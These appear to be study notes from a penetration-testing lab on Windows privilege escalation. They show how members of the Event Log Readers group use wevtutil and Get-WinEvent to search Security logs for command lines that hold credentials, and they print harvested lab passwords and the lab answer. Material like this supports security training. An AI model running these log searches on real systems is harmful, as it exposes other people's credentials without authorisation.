Test group ownership:

net localgroup "Event Log Readers"

Search security logs using wevtutil:

wevtutil qe Security /rd:true /f:text | Select-String "/user"

Passing creds:

wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 | findstr "/user"

<aside> 💡

Reading Security event log with Get-WinEvent requires administrator access, Event Log Readers is not sufficient

</aside>

Search using Get-WinEvent:

PS C:\\htb> Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'} | Select-Object @{name='CommandLine';expression={ $_.Properties[8].Value }}

CommandLine
-----------
net use T: \\\\fs01\\backups /user:tim MyStr0ngP@ssword

event id 4688 → Process creation

Writeup

PS C:\\Users\\logger> wevtutil qe Security /rd:true /f:text | Select-String "/user"

        Process Command Line:   cmdkey  /add:WEB01 /user:amanda /pass:Passw0rd!
        Process Command Line:   net  use Z: \\\\DB01\\scripts /user:mary W1ntergreen_gum_2021!
        Process Command Line:   net  use T: \\\\fs01\\backups /user:tim MyStr0ngP@ssword

→ W1ntergreen_gum_2021!